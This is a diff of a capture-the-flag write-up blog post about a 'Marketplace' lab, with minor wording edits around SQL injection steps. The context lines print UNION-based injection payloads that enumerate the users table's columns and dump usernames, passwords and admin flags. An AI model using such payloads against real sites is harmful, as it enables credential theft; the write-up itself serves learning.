CSpanias/cspanias.github.io/_posts/2023-10-20-Marketplace Write Up (2023).md

 ![sqli-5](sqli-5.png)

 4. There are 3 tables: `items`, `messages`, and `users`.
-The latter seems the most useful as it could contains sensitive data, such as passwords, so let's find out its columns:
+The latter seems the most useful, as it could contain sensitive data, such as passwords, so let's find out its columns:

 ```SQL
 admin?user=0 UNION SELECT group_concat(column_name),2,3,4 FROM information_schema.columns where table_name='users'--
 ```

 ![sqli-6](sqli-6.png)

 Bingo 🎉 !
-We can see that the `users` table contains the column `password`, among others.
+We can see that the `users` table contains a `password` field, among others.

-5. Let's see all the data of the `users` table:
+5. Now we know the column names. we can see all the data of the `users` table:

 ```SQL
 admin?user=0 UNION SELECT group_concat(id, ':', username, ':', password, ':', isAdministrator, '\n'),2,3,4 FROM marketplace.users; --